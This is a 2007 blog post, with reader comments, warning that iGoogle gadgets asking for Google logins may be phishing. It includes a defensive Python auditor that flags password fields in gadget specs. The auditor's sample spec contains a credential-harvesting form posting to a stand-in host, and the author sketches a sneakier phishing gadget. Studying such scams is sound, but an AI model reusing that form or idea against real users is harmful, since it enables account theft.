Posted September 14, 2007 5:58 pm by with 7 comments


Yesterday I mentioned one of my favorite Google gadgets and today I’m going to talk about my least favorite gadget.

There is a lot of sensitive information stored in a person's Google account: AdSense, Analytics, AdWords, and the list goes on. If I were a phishing scammer, a Google login would be almost as good as bank account information. Maybe even better, as stealing money from a bank would draw the attention of the FBI, and I'm not sure how much attention a stolen Google account would draw.

So why in the world is Google letting people add gadgets to the gadget directory that ask for a Google account username and password? Take the Your AdSense Revenue @ iGoogle gadget, for example. Based on the notes on the gadget page, the gadget's source code, and the information on the publisher's website, I would say there is a good chance this is a phishing scam. If a person did a normal gadget search and added that gadget to their iGoogle homepage without clicking through to the gadget details, it would look very official.

I know some will say people should be more careful and not give their Google login information to any third party. That warning flies out the window, though, when the page asking for the login information is actually on

The majority of web users, even experienced ones, could easily be fooled by such a gadget, as there is no clear warning that the login information is being sent to some random website rather than used solely by Google.

If someone wanted to get really evil and sneaky, they would create a gadget similar to the one above but for some random Google service like Webmaster Tools, Analytics, etc.: a service not involved with any monetary part of a Google account, and therefore one people are easier to convince to submit login information for. The same login, of course, gains access to AdSense and AdWords.

Google has a responsibility to fix this loophole. Gadgets that ask for Google account information should not be allowed in the directory. There is an API for that: a gadget can get at account data through Google's own APIs without ever handling the user's password. Google should also make it very clear to all users who add gadgets asking for login information to any service that the information submitted is sent to an unknown third party and is not stored at Google.
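One check a directory reviewer, or a cautious user, could run against a gadget's spec before adding it is to look for password fields and work out where they would be submitted. The Python below is an added example, not code from this post or from Google; the gadget specs are constructed in the shape of a 2007-era iGoogle gadget XML, and the host name gadget-host.example, the field names and the trusted-host list are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts this example treats as legitimate destinations for a Google login form.
# This list is an assumption made for the example, not something the post specifies.
TRUSTED_HOSTS = ("google.com",)

# Constructed sample specs in the shape of a 2007-era iGoogle gadget XML.
# "gadget-host.example" and the field names are made up for this example.
INLINE_GADGET = """<Module>
  <ModulePrefs title="Your AdSense Revenue" />
  <Content type="html"><![CDATA[
    <form action="http://gadget-host.example/login.php" method="post">
      Google login: <input name="email" type="text" />
      Password: <input name="passwd" type="password" />
      <input type="submit" value="Sign in" />
    </form>
  ]]></Content>
</Module>"""

IFRAME_GADGET = """<Module>
  <ModulePrefs title="Your AdSense Revenue" />
  <Content type="url" href="http://gadget-host.example/gadget.php" />
</Module>"""


def host_of(url):
    """Lower-cased host name of an absolute URL, or '' for a relative one."""
    return (urlsplit(url).hostname or "").lower()


def is_trusted(host):
    """True only for a trusted host or a subdomain of one, never for a look-alike."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


class PasswordFieldScanner(HTMLParser):
    """Record every password input together with the action of the form enclosing it."""

    def __init__(self):
        super().__init__()
        self._form_action = None  # None while not inside a <form>
        self.fields = []          # (input name, form action or None)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form_action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.fields.append((a.get("name") or "?", self._form_action))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None


def audit_gadget(spec_xml):
    """Return (finding, detail) pairs saying where a gadget would send a typed-in password."""
    report = []
    for content in ET.fromstring(spec_xml).iter("Content"):
        if content.get("type", "html") == "url":
            # The gadget is just an iframe onto a third-party page; the spec alone
            # cannot tell us what that page asks for, so flag the host and move on.
            report.append(("iframe_from", host_of(content.get("href", ""))))
            continue
        scanner = PasswordFieldScanner()
        scanner.feed(content.text or "")  # the CDATA body is the gadget's HTML
        for name, action in scanner.fields:
            host = host_of(action or "")
            if action is None or not host:
                # No form, or a relative action: script decides where the value goes.
                report.append(("password_destination_unknown", name))
            elif is_trusted(host):
                report.append(("password_to_trusted_host", name))
            else:
                report.append(("password_to_third_party", f"{name} -> {host}"))
    return report


if __name__ == "__main__":
    for label, spec in (("inline", INLINE_GADGET), ("iframe", IFRAME_GADGET)):
        print(label, audit_gadget(spec))
```

The "destination unknown" and iframe findings matter as much as the obvious third-party post: a relative form action or a script-driven submit says nothing about where the password ends up, and an iframe gadget's page has to be fetched and read separately, which is exactly the hard part for anyone who cannot follow the JavaScript. A password field in a directory gadget at all is reason enough to stop, since gadgets have no business collecting Google passwords.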

  • Great article, it points out again how dangerous it is when only one company dominates a whole market. You get a lot of comfort, like one account for everything, but if this account gets stolen you are pretty much f***ed up.
    I couldn't imagine what would happen if someone gets his hands on my account… gmail, calendar, adsense, checkout, adwords, blogspot etc. To point that out: pretty much my whole life in the hands of someone else. That's scary.

  • I totally agree. I checked a service that would enhance Google Reader, but they wanted my login info – yeah, the same login that I used for Google Checkout!!! Not likely!

  • I sure wouldn't give up my login info under any circumstances.

  • Wow, this is pretty scary.. But if you are a webmaster and you use adsense and adwords, I think that you won't login from any other site than

    I think g-talk is the worst… Like e-buddy offering online IM, and g-talk is also included. Any lame site can do an e-buddy clone and steal visitors' passwords, but I think there wouldn't be such important information.

    Just my opinion…

  • Hopefully Google will close the loophole. It’s a little scary and also easy to see how most people wouldn’t think twice about giving out the information.

    The majority will probably assume they're only giving the data to Google anyway and believe they're completely safe.

  • Michael Bierman

    Good points, but AFAIK the same problem exists with Yahoo! Widgets (aka Konfabulator) and perhaps even with Firefox extensions. I don't know of any solid vetting that goes into any of these really cool gizmos that so many of us depend on every day. Most of them have source that is easily viewable, but how many of us carefully review every line of code before installing a gadget, widget, or extension? Certainly this is a barrier to newbies who can't be expected to review their own code.

  • Radley Sustaire

    I fell for this today, didn't even give it a thought, having not used iGoogle before. Once I saw the loading image I realized this wasn't made by Google (not noticing that the gadget was third party in the first place). I immediately changed my password.

    Don't get me wrong, I've seen people phishing and scamming all the time and do some moderate web design myself… But as you said, this can trap even experienced users.

    Visiting the website though, although they have the perfect trap set I don’t see anything suspicious in the iframe, JS pages etc. Nothing seems to send data back to the server. Don’t take my word for that though, I’m a PHP guy – Javascript’s far too hard to read.